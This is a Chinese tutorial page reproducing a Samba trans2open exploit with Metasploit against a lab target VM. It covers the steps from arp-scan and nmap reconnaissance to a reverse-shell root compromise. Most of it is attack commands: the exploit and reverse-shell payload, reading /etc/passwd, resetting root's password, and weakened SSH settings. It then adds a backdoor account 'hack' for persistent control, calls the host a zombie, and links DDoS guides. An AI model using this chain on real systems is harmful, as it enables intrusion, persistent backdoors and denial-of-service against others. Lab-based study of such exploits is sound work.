栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

基于Metasploit完成Samba服务漏洞复现

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

基于Metasploit完成Samba服务漏洞复现

实验环境:

靶机ip:192.168.31.182(下载链接: https://pan.baidu.com/s/1ia-DD8UPDhIkWUd2eJWoKg?pwd=cykq 提取码: cykq 复制这段内容后打开百度网盘手机App,操作更方便哦)

攻击机ip:192.168.31.166(X64)

一:主机发现
arp-scan -l      #扫描同一网段下的主机

可以看到靶机的IP地址和mac地址,Vmware为虚拟机 

2.漏洞扫描
nmap  192.168.31.182  -p- -sV -sS -T4 -A         #扫描开放的端口和服务                                          

 可以看到存在samba服务漏洞

 靶机的操作系统为linux 2.4.X,属于较低版本

 确定Samba服务的版本号

msfconsole  
search smb_version
use auxiliary/scanner/smb/smb_version 
show options
set rhosts 192.168.31.182
run

 3.漏洞利用
search samba 2.2
exploit/linux/samba/trans2open       #   或者use2
show options 
set rhosts 192.168.31.182
set payload linux/x86/shell_reverse_tcp
set lport 5555       #更换端口号,如果默认4444端口号会报错出先下图错误,建议更换端口号为5555即可成功执行
run



 注意:如果出下面这种情况,更换本地监听主机的端口号

[-] Handler failed to bind to 192.168.31.166:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 192.168.31.182:139 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

 4.攻击成功
id
cat /etc/passwd

出现下面的截图说明靶机攻击成功,接下来就是植入后门账号

可以看到 拿到的是root权限,但是这个shell中的有些命令受限制,我们在把集中增加一个新的后门账户,进行长久控制靶机,使之成为肉鸡

passwd root     #修改root账号的密码,进行ssh登录
123456
123456          #重复输入两次密码

 

5.远程连接靶机

1.问题复现

使用具有最高权限的root账号进行ssh远程连接靶机,正常情况输入两次密码即可正常连接,但是报错

ssh root@192.168.31.182                                                  255 ⨯

ssh root@192.168.31.182                                                  255 ⨯
Unable to negotiate with 192.168.31.182 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

无法与192.168.31.182协商端口22:没有找到匹配的密钥交换方法。 他们的提议:diffie-hellman-group-exchange-sha1 diffie-hellman-group1-sha1  

2.报错截图

3.问题解决

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc root@192.168.31.182

root为登录的用户名,192,。168.31.182为靶机ip地址

成功登录靶机

 6.在靶机中增加账号
useradd hack
passwd 
123456
123456

 

cat /etc/passwd

 可以看到新的后门账号添加成功,接下来用后门账号远程ssh连接靶机

 ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc hack@192.168.31.182       #用hack账号登录靶机

 7.利用肉鸡执行ddos攻击

附大佬博客

如何在Kali Linux上发动DDOS攻击 - 云+社区 - 腾讯云 (tencent.com)https://cloud.tencent.com/developer/article/1199800

(63条消息) 利用kali进行DOS/DDOS攻击(局域网内)(DHCP原理 ARP原理)_Firebasky的博客-CSDN博客_kali攻击路由器瘫痪https://blog.csdn.net/qq_46091464/article/details/105857350


 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/756800.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号